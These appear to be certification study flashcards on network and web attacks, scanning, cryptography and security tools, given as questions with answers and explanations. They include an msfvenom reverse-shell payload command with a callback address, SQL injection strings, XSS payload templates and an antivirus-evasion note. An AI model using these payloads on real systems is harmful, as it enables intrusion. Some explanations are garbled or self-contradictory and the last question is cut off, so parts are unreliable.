B. STP Attack Keyword is root bridge STP achieves loop-free topology by selecting one switch as the root bridge. If the root bridge goes down, the STP topology must find a new root bridge and the election starts in that moment. Port does not immediately transition from the blocking state to the forwarding state. Rather, a port transitions from blocking to listening, then to learning, and then again to the forwarding state. The time before port starts to forward packets can be up to one minute. An STP manipulation attack is when an attacker, hacker, or an unauthorized user spoof the root bridge in the topology. The attacker broadcasts out an STP configuration/topology change BPDU in an attempt to force an STP recalculation. The BPDU sent out announces that the attacker's system has a lower bridge priority. The attacker can then see a variety of frames forwarded from other switches to it. To prevent this attack you need to secure edge ports (or other untrusted ports) with options like · root-guard - prevents a port to become root port · bpdu-guard - disables a port on BPDU reception · bpdu-filter - ignores BPDUs received on a given port (disabling loop detection by STP!) · tcn-guard - ignores topology change notifications received on a given port

Which of the following tools would you use to audit a multi-cloud environment? A. OpenVAS B. ScoutSuite C. Prowler D. Pacu

B. ScoutSuite ScoutSuite is used to audit instances and policies created on multi-cloud platforms. Prowler is a cloud auditing tool, but it can only be used on AWS. Pacu is an exploitation framework that is used to test the security configurations of an AWS account. OpenVAS is a general-purpose vulnerability scanner but does not deal with cloud-specific issues.

You are scanning a target as part of a penetration test. You discovered that the network uses Snort configured as a network-based IDS. Which of the following occurs when an alert rule has been matched in Snort during your scan? A. The packet matching the rule will be dropped and the IDS will continue scanning new packets B. The entire packet will be evaluated until all of the IDS alert rules have been checked and the packet is allowed to continue its journey C. The IDS will send an alert, stop checking the rest of the rules, and allow the packet to continue its journey D. The source IP address will be blocked and its connection with the network terminated

B. The entire packet will be evaluated until all of the IDS alert rules have been checked and the packet is allowed to continue its journey If Snort is operating as an IDS, it will not block the connection or drop the packet. Instead, Snort will evaluate the entire packet and check all the alert rules, logging any matches it finds, and then allow it to continue onward to its destination.

While conducting a penetration test of a web application, you enter the following URL, http://test.diontraining.com/? param=<data:text/html;base64, MALICIOUS CODE GOES HERE ==. What type of exploit are you attempting? A.SQL injection B. XSS C. XML injection D. Password spraying

B. XSS This is an example of a URL-based XSS (cross-site scripting) attack. A cross-site scripting attack uses a specially crafted URL that includes attack code that will cause information that users enter into their web browser to be sent to the attacker. In this example, everything from ? paramater onward is part of the attack. While you could not convert it during the exam without a base64 decoder, you should be able to tell that it is not a SQL injection (single quote or one equals one) nor an XML injection based on your studies. It is also not an attempt to conduct password spraying by logging into different usernames with the same password. So, by process of elimination, you can determine this is an XSS attack.

A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URL, http://test.diontraining.com/?param=< data:text /html;base64 THIS SHOULD BE JUNK TEXT HERE ==. What type of attack was attempted? A. SQL injection B. XSS C. XML injection D. Password spraying

B. XSS This is an example of a URL-based XSS (cross-site scripting) attack. A cross-site scripting attack uses a specially crafted URL that includes attack code that will cause information that users enter into their web browser to be sent to the attacker. In this example, everything from ?param onward is part of the attack.You can see the base 64 encoded string of being used. While you could not convert it during the exam without a base64 decoder, you should be able to tell that it is not a SQL injection nor an XML injection based on your studies. It is also not an attempt to conduct password spraying by logging into different usernames with the same password. So, by process of elimination, you can determine this is an XSS attack.

While conducting a static analysis source code review of a program, you see the following line of code: String query = "SELECT * FROM CUSTOMER WHERE CUST_ID='" + request.getParameter("id") + "'"; What is the issue with the largest security issue with this line of code? A. The code is using parameterized queries B. The * operator will allow retrieval of every data field about this customer in the CUSTOMER table C. An SQL injection could occur because input validation is not being used on the id parameter D. This code is vulnerable to a buffer overflow attack Explanation

C. An SQL injection could occur because input validation is not being used on the id parameter This code takes the input of "id" directly from a user or other program without conducting any input validation. This could be exploited and used as an attack vector for an SQL injection. If a malicious user can alter the ID source, it might get replaced with something like' or ONE=ONE. This will cause the SQL statement to become: "SELECT * FROM CUSTOMER WHERE CUST_ID='' or ONE=ONE. Because '1' always equals '1', the where clause will always return 'true,' meaning that EVERY record in the database could now become available to the attacker. When creating SQL statements, there are reasons for and against the use of the * operator. Its presence alone does not necessarily indicate a weakness. With only one line of code being reviewed, you cannot make any statement about whether it is vulnerable to a buffer overflow attack. You do not see the declaration values for the initialization of the id variable. This code is not using parameterized queries, but if it did, then it would eliminate this vulnerability. A parameterized query is a type of output encoding that relies on prepared statements to reduce the risk of an SQL injection.

An insurance company has developed a new web application to allow its customers to choose and apply for an insurance plan. You have been asked to help perform a security review of the new web application. You have discovered that the application was developed in ASP and used MSSQL for its backend database. You have been able to locate an application's search form and introduced the following code in the search input field: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-IMG SRC= SCRIPT HERE:msgbox("MALICIOUS CODE HERE":msgbox("Vulnerable_to_Attack ");>"-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- When you click submit on the search form, your web browser returns a pop-up window that displays Vulnerable_to_Attack. Which of the following vulnerabilities did you discover in the web application? A. Cross-site request forgery B. Command injection C. Cross-site scripting D. SQL injection

C. Cross-site scripting This is a form of Cross-Site Scripting (XSS). Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. Attackers may use a cross-site scripting vulnerability to bypass access controls such as the same-origin policy. Cross-site request forgery (CSRF or XSRF) is a malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts. There are many ways in which a malicious website can transmit commands, such as specially-crafted image tags, hidden forms, and JavaScript XMLHttpRequests can all work without the user's interaction or even knowledge. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. Command injection is an attack in which the goal is to execute arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell.

What is a reverse proxy commonly used for? A. Allowing access to a virtual private cloud B. To prevent the unauthorized use of cloud services from the local network C. Directing traffic to internal services if the contents of the traffic comply with the policy D. To obfuscate the origin of a user within a network

C. Directing traffic to internal services if the contents of the traffic comply with the policy A reverse proxy is positioned at the cloud network edge and directs traffic to cloud services if the contents of that traffic comply with the policy. This does not require the configuration of the users' devices. This approach is only possible if the cloud application has proxy support. You can deploy a reverse proxy and configure it to listen for client requests from a public network, like the internet. The proxy then creates the appropriate request to the internal server on the corporate network and passes the server's response back to the external client. They are not generally intended to obfuscate the source of communication, nor are they necessarily specific to the cloud. A cloud access security broker (CASB) can be used to prevent unauthorized use of cloud services from the local network.

You are conducting a code review of a program and observe the following calculation of 0xffffffff + 1 was attempted, but the result was returned as 0x0000000. Based on this, what type of exploit could be created against this program? A. SQL injection B. Impersonation C. Integer overflow attack D. Password spraying

C. Integer overflow attack Integer overflows and other integer manipulation vulnerabilities frequently result in buffer overflows. An integer overflow occurs when an arithmetic operation results in a large number to be stored in the space allocated for it. Integers are stored in 32 bits on the x86 architecture; therefore, if an integer operation results in a number greater than 0xffffffff, an integer overflow occurs, as was the case in this example. SQL injection is an attack that injects a database query into the input data directed at a server by accessing the application's client-side. Password spraying is a type of brute force attack in which multiple user accounts are tested with a dictionary of common passwords. Impersonation is the act of pretending to be another person or system for fraud.

You are conducting a wireless penetration test against an organization. During your reconnaissance, you discover that their network is known as "BigCorpWireless" has its SSID broadcast is enabled. You configure your laptop to respond to requests for connection to "BigCorpWireless" and park at the far end of the parking lot. At the end of the workday, as people get in their cars in the parking lot, you see numerous smartphones connecting to your laptop over WiFi. Which of the following exploits did you utilize? A. Fragmentation attack B. Deauthentication attack C. Karma attack D. Downgrade attack

C. Karma attack A karma attack is a variant of the evil twin attack. A karma attack exploits the behavior of a wireless client trying to connect to its preferred network list. This list contains the SSIDs of access points the device has connected to in the past. When a wireless device is looking to connect to the internet, it firsts beacons to determine if any of these previously connected to networks are within range. This allows an attacker to answer the request, allowing the user to connect to them instead as an evil twin. At this point, the attacker is now the man-in-the-middle between the wireless client and the internet, which is useful for many different exploits.

Determine the attack by the description: The known-plaintext attack used against DES. This attack causes that encrypting plaintext with one DES key followed by encrypting it with a second DES key is no more secure than using a single key. A. Replay attack B. Traffic analysis attack C. Meet-in-the-middle attack D. Man-in-the-middle attack

C. Meet-in-the-middle attack The meet-in-the-middle attack (MITM), a known plaintext attack, is a generic space-time tradeoff cryptographic attack against encryption schemes that rely on performing multiple encryption operations in sequence. The MITM attack is the primary reason why Double DES is not used and why a Triple DES key (168-bit) can be bruteforced by an attacker with 256 space and 2112 operations. The intruder has to know some parts of plaintext and their ciphertexts. Using meet-in-the-middle attacks it is possible to break ciphers, which have two or more secret keys for multiple encryption using the same algorithm. For example, the 3DES cipher works in this way. Meet-in-the-middle attack was first presented by Diffie and Hellman for cryptanalysis of DES algorithm.

What must be developed to show security improvements over time? A. Reports B. Testing tools C. Metrics D. Taxonomy of vulnerabilities

C. Metrics Metrics are a method of measuring something over time. If you wish to show the effect of security improvements over time, creating metrics would be a good option. For example, you may wish to look at the number of unpatched and known vulnerabilities. As this number decreases, your network would be considered to have improved security. Reports and testing tools alone cannot show progress. You must have measurable results using metrics.

A technician just completed the second phase of their scans using Firewalk and the following output was displayed on their terminal: TCP port 21 - no response TCP port 22 - no response TCP port 23 - Time-to-live exceeded Based on these scan results, which of the following statements are true? A. Firewall is blocking ports 21 through 23 and a service on the target is listening on port 23 B. No response from port 21 and 22 indicates services are not running on the target C. Port 23 was not blocked at the firewall because the scan on port 23 passed through the filtering device D. A TTL response error indicates port 23 was able to make a connection to the target

C. Port 23 was not blocked at the firewall because the scan on port 23 passed through the filtering device Keyword in question is time to live exceeded. Firewalk is a scanning tool that sends TCP or UDP packets with a TTL one greater than the targeted gateway. If the gateway allows the traffic, it will forward the packets to the next hop where they will expire and elicit an ICMP_TIME_EXCEEDED message. If the gateway host does not allow the traffic, it will likely drop the packets and no response will be sent. Therefore, if a TTL exceeded message is received, this indicates that the associated port is being filtered by a firewall and not the gateway itself.

Cybersecurity analysts are experiencing some issues with their vulnerability scans aborting because the previous day's scans are still running when the scanner attempts to start the current day's scans. Which of the following recommendations is LEAST likely to resolve this issue? A. Add another vulnerability scanner B. Reduce the scope of scans C. Reduce the sensitivity of scans D. Reduce the frequency of scans

C. Reduce the sensitivity of scans **KEYWORD IS LEAST LIKELY If the cybersecurity analyst were to reduce the scans' sensitivity, it still would not decrease the time spent scanning the network and could alter the effectiveness of the results received. In this scenario, the scans, as currently scoped, are taking more than 24 hours to complete with the current resources. The analyst could reduce the scans' scope, thereby scanning fewer systems or vulnerabilities signatures and taking less time to complete. Alternatively, the analyst could reduce the scans' frequency by moving to a less frequent schedule, such as one scan every 48 hours or one scan per week. The final option would be to add additional vulnerability scanners to the process. This would allow the two scanners to work together to divide the workload and complete the task within the 24-hour scan frequency currently provided.

Dion Training has publicly hosted web applications and an internal Intranet server that is protected by a firewall. Which of the following techniques would help them protect themselves against enumeration? A. Reject all invalid emails received over SMTP B. Allow full DNS zone transfer C. Remove A records for any internal hosts D. Enable null session pipes on their intranet

C. Remove A records for any internal hosts. Keyword is internal. Any internal server names and IPs should have their A records removed from the external DNS server because only internal users need to access the internal records. Dion Training's internal servers should only have A records on their internal DNS server. Those A records should not be forwarded outside of the firewall boundary to prevent reconnaissance and enumeration by attackers.

Identify Secure Hashing Algorithm, which produces a 160-bit digest from a message on principles similar to those used in MD4 and MD5? A. SHA-3 B. SHA-2 C. SHA-1 D. SHA-0

C. SHA-1 SHA-1 (Secure Hash Algorithm 1) is a cryptographic hash function which takes an input and produces a 160-bit (20-byte) hash value known as a message digest - typically rendered as a hexadecimal number, 40 digits long. It was designed by the United States National Security Agency, and is a U.S. Federal Information Processing Standard. SHA-1 produces a message digest based on principles similar to those used by Ronald L. Rivest of MIT in the design of the MD2, MD4 and MD5 message digest algorithms, but generates a larger hash value (160 bits vs. 128 bits). Incorrect answers: SHA-0 https://en.wikipedia.org/wiki/SHA-1#SHA-0 The original algorithm specification was published in 1993 as the Secure Hash Standard (FIPS PUB 180). This version is known as SHA-0 and soon after the issue was withdrawn by NSA which made the change on it. The change concerned the rotation bits left by n positions and should contribute to greater security. April 17, 1995 it was granted a standard and the version known as SHA-1 (FIPS PUB 180-1). SHA-2 https://en.wikipedia.org/wiki/SHA-2 SHA-2 (Secure Hash Algorithm 2) is a set of cryptographic hash functions designed by the United States National Security Agency (NSA) and first published in 2001. They are built using the Merkle-Damgård construction, from a one-way compression function itself built using the Davies-Meyer structure from a specialized block cipher. SHA-2 includes significant changes from its predecessor, SHA-1. The SHA-2 family consists of six hash functions with digests (hash values) that are 224, 256, 384 or 512 bits: SHA-224, SHA-256, SHA-384, SHA-512, SHA-512/224, SHA-512/256. SHA-256 and SHA-512 are novel hash functions computed with 32-bit and 64-bit words, respectively. They use different shift amounts and additive constants, but their structures are otherwise virtually identical, differing only in the number of rounds. SHA-224 and SHA-384 are truncated versions of SHA-256 and SHA-512 respectively, computed with different initial values. SHA-512/224 and SHA-512/256 are also truncated versions of SHA-512, but the initial values are generated using the method described in Federal Information Processing Standards (FIPS) PUB 180-4. SHA-2 was first published by the National Institute of Standards and Technology (NIST) as a U.S. federal standard (FIPS). The SHA-2 family of algorithms are patented in US patent 6829355. The United States has released the patent under a royalty-free license. SHA-3 https://en.wikipedia.org/wiki/SHA-3 SHA-3 (Secure Hash Algorithm 3) is the latest member of the Secure Hash Algorithm family of standards, released by NIST on August 5, 2015. Although part of the same series of standards, SHA-3 is internally different from the MD5-like structure of SHA-1 and SHA-2. SHA-3 is a subset of the broader cryptographic primitive family Keccak (/ˈkɛtʃæk/ or /ˈkɛtʃɑːk/), designed by Guido Bertoni, Joan Daemen, Michaël Peeters, and Gilles Van Assche, building upon RadioGatún. Keccak's authors have proposed additional uses for the function, not (yet) standardized by NIST, including a stream cipher, an authenticated encryption system, a "tree" hashing scheme for faster hashing on certain architectures, and AEAD ciphers Keyak and Ketje. Keccak is based on a novel approach called sponge construction.Sponge construction is based on a wide random function or random permutation, and allows inputting ("absorbing" in sponge terminology) any amount of data, and outputting ("squeezing") any amount of data, while acting as a pseudorandom function with regard to all previous inputs. This leads to great flexibility.

Philip, a cybersecurity specialist, needs a tool that can function as a network sniffer, record network activity, prevent and detect network intrusion. Which of the following tools is suitable for Philip? A. Nmap B. Cain & Abel C. Snort D. Nessus

C. Snort Snort is a free open source network intrusion detection system (IDS) and intrusion prevention system (IPS) created in 1998 by Martin Roesch, founder and former CTO of Sourcefire. Snort is now developed by Cisco, which purchased Sourcefire in 2013. Snort's open-source network-based intrusion detection/prevention system (IDS/IPS) has the ability to perform real-time traffic analysis and packet logging on Internet Protocol (IP) networks. Snort performs protocol analysis, content searching and matching. The program can also be used to detect probes or attacks, including, but not limited to, operating system fingerprinting attempts, semantic URL attacks, buffer overflows, server message block probes, and stealth port scans. Snort can be configured in three main modes: 1. sniffer, 2. packet logger, and 3. network intrusion detection.

A pentester is trying to map the organization's internal network. The analyst enters the following command (nmap -n -sS -T4 -p 80 10.0.3.0/24). What type of scan is this? A. Quick Scan B. Intense Scan C. Stealth Scan D. Comprehensive Scan

C. Stealth Scan In nmap, the -sS flag signifies a stealth scan. This is also known as an SYN scan and is the most popular scan option for good reasons. It can be performed quickly, scanning thousands of ports per second on a fast network, and is not hampered by restrictive firewalls. It is also relatively unobtrusive and stealthy since it never completes TCP connections.

The evil hacker Antonio is trying to attack the IoT device. He will use several fake identities to create a strong illusion of traffic congestion, affecting communication between neighbouring nodes and networks. What kind of attack does Antonio perform? A. Forged Malicious Device B. Side-Channel Attack C. Sybil Attack D. Exploit Kits

C. Sybil Attack Keyword here are fake IDs which is how Sybil attacks work. The Sybil attack in computer security is an attack wherein a reputation system is subverted by creating multiple identities. A reputation system's vulnerability to a Sybil attack depends on how cheaply identities can be generated, the degree to which the reputation system accepts inputs from entities that do not have a chain of trust linking them to a trusted entity, and whether the reputation system treats all entities identically. As of 2012, evidence showed that large-scale Sybil attacks could be carried out in a very cheap and efficient way in extant realistic systems such as BitTorrent Mainline DHT.

Which of the following SQL injection attack does an attacker usually bypassing user authentication and extract data by using a conditional OR clause so that the condition of the WHERE clause will always be true? A. End-of-Line Comment B. UNION SQLi C. Tautology D. Error-Based SQLi

C. Tautology In a tautology-based attack, the code is injected using the conditional OR operator such that the query always evaluates to TRUE. Tautology-based SQL injection attacks are usually bypass user authentication and extract data by inserting a tautology in the WHERE clause of a SQL query. The query transform the original condition into a tautology, causes all the rows in the database table are open to an unauthorized user. A typical SQL tautology has the form "or <comparison expression>", where the comparison expression uses one or more relational operators to compare operands and generate an always true condition. If an unauthorized user input user id as abcd and password as anything' or 'x'='x then the resulting query will be: select * from user_details where userid = 'abcd' and password = 'anything' or 'x'='x' Incorrect answers: Error-based SQLi The Error based technique, when an attacker tries to insert malicious query in input fields and get some error which is regarding SQL syntax or database. For example, SQL syntax error should be like this: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''VALUE''. The error message gives information about the database used, where the syntax error occurred in the query. Error based technique is the easiest way to find SQL Injection. UNION SQLi When an application is vulnerable to SQL injection and the results of the query are returned within the application's responses, the UNION keyword can be used to retrieve data from other tables within the database. This results in an SQL injection UNION attack. The UNION keyword lets you execute one or more additional SELECT queries and append the results to the original query. For example: SELECT a, b FROM table1 UNION SELECT c, d FROM table2 This SQL query will return a single result set with two columns, containing values from columns a and b in table1 and columns c and d in table2. For a UNION query to work, two key requirements must be met: · The individual queries must return the same number of columns. · The data types in each column must be compatible between the individual queries. To carry out an SQL injection UNION attack, you need to ensure that your attack meets these two requirements. End-of-Line Comment After injecting code into a particular field, legitimate code that follows if nullified through the usage of end of line comments: SELECT * FROM user WHERE name = 'x' AND userid IS NULL; --';

Which of the following technologies combines the functionality of a firewall, malware scanner, and other security appliances into one device? A. IPS B. Syslog C. UTM D. IDS

C. UTM A Unified Threat Management (UTM) appliance is one that enforces a variety of security-related measures, combining the work of a firewall, malware scanner, and intrusion detection/prevention. A UTM centralizes the threat management service, providing simpler configuration and reporting than isolated applications spread across several servers or devices.

You have run a vulnerability scan and received the following output: CVE-2011-3389 QID 42366 - SSLv3.0/TLSv1.0 Protocol weak CBC mode Server side vulnerability Check with: openssl s_client -connect login.diontraining.com:443 - tls -cipher "AES:CAMELLISA:SEED:3DES:DES" Which of the following categories should this be classified as? A. PKI transfer vulnerability B. Active Directory encryption vulnerability C. Web application cryptography vulnerability D. VPN tunnel vulnerability

C. Web application cryptography vulnerability Keywords that can be taken from the scan are protocol weak. Also use of 3DES/DES. This vulnerability should be categories as a web application cryptographic vulnerability. This is shown by the weak SSLv3.0/TLSv1.0 protocol being used in cipher block chaining (CBC) mode. Specifically, the use of the 3DES and DES algorithms during negotiation is a significant vulnerability. A stronger protocol should be used, such as forcing the use of AES.

Identify the correct syntax for ICMP scan on a remote computer using hping2. A. hping2 target.domain.com B. hping2 --set-ICMP target.domain.com C. hping2 -1 target.domain.com D. hping2 --l target.domain.com

C. hping2 -1 target.domain.com

Which of the following Metasploit Framework tool can be used to bypass antivirus? A. msfcli B. msfd C. msfencode D. msfpayload

C. msfencode https://www.offensive-security.com/metasploit-unleashed/msfencode/ One of the best ways to avoid being stopped by antivirus software is to encode our payload with msfencode. Msfencode is a useful tool that alters the code in an executable so that it looks different to antivirus software but will still run the same way. Much as the binary attachment in email is encoded in Base64, msfencode encodes the original executable in a new binary. Then, when the executable is run, msfencode decodes the original code into memory and exe-cutes it.

What command could be used to list the active services from the Windows command prompt? A. sc query type= running B. sc query \\servername C. sc query D. sc config

C. sc query Windows uses the sc query to display information about the running service. It is part of the Service Control command-line tool, known as sc. The sc config command will modify the value of a service's entries in the registry and the Service Control Manager database. The sc query command will obtain and display information about the specified service, driver, type of service, or driver type. By entering just the sc query, the command will return the information on the active services only. By using the type=running option, only the information on the running service will be displayed. If the command sc query \\servername is used, then the remote server's active services (\\servername) will be displayed.

Which of the following can be designated as "Wireshark for CLI"? A. John the Ripper B. nessus C. tcpdump D. ethereal

C. tcpdump Tcpdump is a data-network packet analyzer computer program that runs under a command-line interface. It allows the user to display TCP/IP and other packets being transmitted or received over a network to which the computer is attached. Distributed under the BSD license, tcpdump is free software. https://www.wireshark.org/ Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. NOTE: Wireshark is very similar to tcpdump, but has a graphical front-end, plus some integrated sorting and filtering options.

Your company has just announced a change to an "API first" model of software development. As a cybersecurity analyst, you are immediately concerned about the possibility of an insecure deserialization vulnerability in this model. Which of the following is the primary basis for an attack against this vulnerability? A. Lack of input validation could allow for a SQL attack B. Insufficient logging and monitoring makes it impossible to detect when insecure deserialization vulnerabilities are exploited C. Lack of input validation could lead to a cross-site scripting attack D. Accepting serialized objects from untrusted sources or the use of serialized non-primitive data may lead to remote code execution

D. Accepting serialized objects from untrusted sources or the use of serialized non-primitive data may lead to remote code execution When implementing an API, objects in memory from one computer can be serialized and passed to another for deserialization. If the API user is malicious, they may create a fictitious object, appropriately serialize it, and then send it through the API for execution. The only model for defeating this approach is to allow the API to be exposed to trusted sources or to not serialize anything with potentially executable source code (i.e., non-primitive data types). Cross-site scripting and SQL attacks are not a concern for an API first model. While stuffiest logging and monitoring would prevent an analyst from detecting if a deserialization vulnerability was exploited, these alone would not be the basis for an attack against deserialization.

Which of the following threats to a SaaS deployment would be the responsibility of the consumer to remediate? A. Cross-site scripting B. SQL injections C. Unpatched operating systems on the server D. An endpoint security failure

D. An endpoint security failure In a SaaS model, the consumer has to ensure that the endpoints being used to access the cloud are secure. Since the consumer owns the endpoint (laptop, desktop, tablet, smartphone, etc.), they are responsible for securing it. The entire concept behind using a SaaS product is that the service provider will patch the servers' underlying operating systems, create secure software that isn't vulnerable to SQL injection or cross-site scripting attacks, and ensure proper operations and maintenance of the backend systems.

What encryption does WPA use?

TKIP (Temporal Key Integrity Protocol)

During a port scan on the target host, your colleague sends FIN/ACK probes and finds that an RST packet is sent in response by the target host, indicating that the port is closed. Which of the following port scanning techniques did your colleague use? A. IDLE/IPID header scan B. ACK flag probe scan C. Xmas scan D. TCP Maimon scan

The Maimon scan is named after its discoverer, Uriel Maimon. He described the technique in Phrack Magazine issue #49 (November 1996). Nmap, which included this technique, was released two issues later. This technique is exactly the same as NULL, FIN, and Xmas scan, except that the probe is FIN/ACK. According to RFC 793 (TCP), a RST packet should be generated in response to such a probe whether the port is open or closed. However, Uriel noticed that many BSD-derived systems simply drop the packet if the port is open

Session riding

XSRF. Involves unauthorized commands from a trusted user to a user or web site.

Which of the following is the hacker's first step in conducting a DNS cache poisoning attack on a target organization? a. The hacker queries a nameserver using the DNS resolver. b. The hacker makes a request to the DNS resolver. c. The hacker forges a reply from the DNS resolver. d. The hacker uses TCP to poison the DNS resolver.

b. The hacker makes a request to the DNS resolver. https://ru.wikipedia.org/wiki/DNS_spoofing DNS spoofing is a threat that copies the legitimate server destinations to divert the domain's traffic. Ignorant these attacks, the users are redirected to malicious websites, which results in insensitive and personal data being leaked. It is a method of attack where your DNS server is tricked into saving a fake DNS entry. This will make the DNS server recall a fake site for you, thereby posing a threat to vital information stored on your server or computer. The cache poisoning codes are often found in URLs sent through spam emails. These emails are sent to prompt users to click on the URL, which infects their computer. When the computer is poisoned, it will divert you to a fake IP address that looks like a real thing. This way, the threats are injected into your systems as well. Different Stages of Attack of DNS Cache Poisoning: - The attacker proceeds to send DNS queries to the DNS resolver, which forwards the Root/TLD authoritative DNS server request and awaits an answer. - The attacker overloads the DNS with poisoned responses that contain several IP addresses of the malicious website. To be accepted by the DNS resolver, the attacker's response should match a port number and the query ID field before the DNS response. Also, the attackers can force its response to increasing their chance of success. - If you are a legitimate user who queries this DNS resolver, you will get a poisoned response from the cache, and you will be automatically redirected to the malicious website.

You were instructed to check the configuration of the webserver and you found that the server permits SSLv2 connections, and the same private key certificate is used on a different server that allows SSLv2 connections. You understand that this vulnerability makes the web server vulnerable to attacks as the SSLv2 server can leak key information. Which of the following attacks can an attacker perform using this vulnerability? a. DUHK attack b. Padding oracle attack c. DROWN attack d. Side-channel attack

c. DROWN attack https://en.wikipedia.org/wiki/DROWN_attack The DROWN (Decrypting RSA with Obsolete and Weakened eNcryption) attack is a cross-protocol security bug that attacks servers supporting modern SSLv3/TLS protocol suites by using their support for the obsolete, insecure, SSL v2 protocol to leverage an attack on connections using up-to-date protocols that would otherwise be secure. DROWN can affect all types of servers that offer services encrypted with SSLv3/TLS yet still support SSLv2, provided they share the same public key credentials between the two protocols. Additionally, if the same public key certificate is used on a different server that supports SSLv2, the TLS server is also vulnerable due to the SSLv2 server leaking key information that can be used against the TLS server. Full details of DROWN were announced in March 2016, along with a patch that disables SSLv2 in OpenSSL; the vulnerability was assigned the ID CVE-2016-0800. The patch alone will not be sufficient to mitigate the attack if the certificate can be found on another SSLv2 host. The only viable countermeasure is to disable SSLv2 on all servers.

John sent a TCP ACK segment to a known closed port on a firewall, but it didn't respond with an RST. What conclusion can John draw about the firewall he scanned? a. John can't draw any conclusions based on this information. b. It's a non-stateful firewall. c. It's a stateful firewall. d. There is no firewall.

c. It's a stateful firewall. TCP ACK segments use for gathering information about firewall or ACL configuration. This type of scan aims to discover information about filter configurations rather than a port state. This type of scanning is rarely useful alone, but when combined with SYN scanning, it gives a more complete picture of the type of present firewall rules. When a TCP ACK segment is sent to a closed port or sent out-of-sync to a listening port, the RFC 793 expected behavior is for the device to respond with an RST. Getting RSTs back in response to an ACK scan gives useful information that can be used to infer the type of firewall present. Stateful firewalls will discard out-of-sync ACK packets, leading to no response. When this occurs, the port is marked as filtered.

Which of the following SQLi types leverages a database server's ability to make DNS requests to pass data to an attacker? a. In-band SQLi b. Time-based blind SQLi c. Out-of-band SQLi d. Union-based SQLi

c. Out-of-band SQLi Out-of-band SQL injection is not very common, mostly because it depends on features being enabled on the database server being used by the web application. Out-of-band SQL injection occurs when an attacker is unable to use the same channel to launch the attack and gather results. Out-of-band techniques, offer an attacker an alternative to inferential time-based techniques, especially if the server responses are not very stable (making an inferential time-based attack unreliable). Out-of-band SQLi techniques would rely on the database server's ability to make DNS or HTTP requests to deliver data to an attacker. Such is the case with Microsoft SQL Server's xp_dirtree command, which can be used to make DNS requests to a server an attacker controls; as well as Oracle Database's UTL_HTTP package, which can be used to send HTTP requests from SQL and PL/SQL to a server an attacker controls. Incorrect answers: - In-band SQLi In-band SQL injection is the most common and easy-to-exploit of SQL injection attacks. In-band SQL injection occurs when an attacker is able to use the same communication channel to both launch the attack and gather results. - Union-based SQLi Union-based SQLi is an in-band SQL injection technique that leverages the UNION SQL operator to combine the results of two or more SELECT statements into a single result which is then returned as part of the HTTP response. - Time-based blind SQLi Time-based SQL injection is an inferential SQL injection technique that relies on sending an SQL query to the database which forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE. Depending on the result, an HTTP response will be returned with a delay, or returned immediately. This allows an attacker to infer if the payload used returned true or false, even though no data from the database is returned. This attack is typically slow (especially on large databases) since an attacker would need to enumerate a database character by character.

Which of the following is a correct example of using msfvenom to generate a reverse TCP shellcode for Windows? a. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.12 LPORT=8888 -f c b. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.12 LPORT=8888 -f c c. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.12 LPORT=8888 -f exe > shell.exe d. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.12 LPORT=8888 -f exe > shell.exe

c. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.12 LPORT=8888 -f exe > shell.exe https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that can give you a shell in almost any situation. For each of these payloads you can go into msfconsole and select exploit/multi/handler. Run 'set payload' for the relevant payload used and configure all necessary options (LHOST, LPORT, etc). Execute and wait for the payload to be run. For the examples below it's pretty self explanatory but LHOST should be filled in with your IP address (LAN IP if attacking within the network, WAN IP if attacking across the internet), and LPORT should be the port you wish to be connected back on.

You are reverse engineering a piece of malware recovered from a retailer's network for analysis. They found that the malicious code was extracting track data from their customer's credit cards during processing. Which of the following types of threats would you classify this malware as? A. Rootkit B. Keylogger C. Ransomware D. POS malware

D. POS malware Keyword words here are retailers network, credit card processing. Point-of-sale malware (POS malware) is usually a type of malicious software (malware) that is used by cybercriminals to target point of sale (POS) and payment terminals with the intent to obtain credit card and debit card information, a card's track 1 or track 2 data and even the CVV code, by various man-in-the-middle attacks, that is the interception of the processing at the retail checkout point of sale system. Ransomware is a type of malware that threatens to publish the victim's data or perpetually block access to it unless a ransom is paid. Keyloggers are a type of monitoring software designed to record keystrokes made by a user. These keyloggers can record the information you type into a website or application and send to back to an attacker. A rootkit is a malware class that modifies system files, often at the kernel level, to conceal its presence.

Which of the following AAA protocols can use for authentication users connecting via analog modems, Digital Subscriber Lines (DSL), wireless data services, and Virtual Private Networks (VPN) over a Frame Relay network? A. Kerberos B. TACACS C. DIAMETER D. RADIUS

D. RADIUS Remote Authentication Dial-In User Service (RADIUS) is a networking protocol that provides centralized authentication, authorization, and accounting (AAA) management for users who connect and use a network service. RADIUS is a client/server protocol that runs in the application layer, and can use either TCP or UDP. Network access servers, which control access to a network, usually contain a RADIUS client component that communicates with the RADIUS server. RADIUS is often the back-end of choice for 802.1X authentication. A RADIUS server is usually a background process running on UNIX or Microsoft Windows.

With which of the following SQL injection attacks can an attacker deface a web page, modify or add data stored in a database and compromised data integrity? A. Loss of data availability. B. Information Disclosure. C. Compromised Data Integrity. D. Unauthorized access to an application.

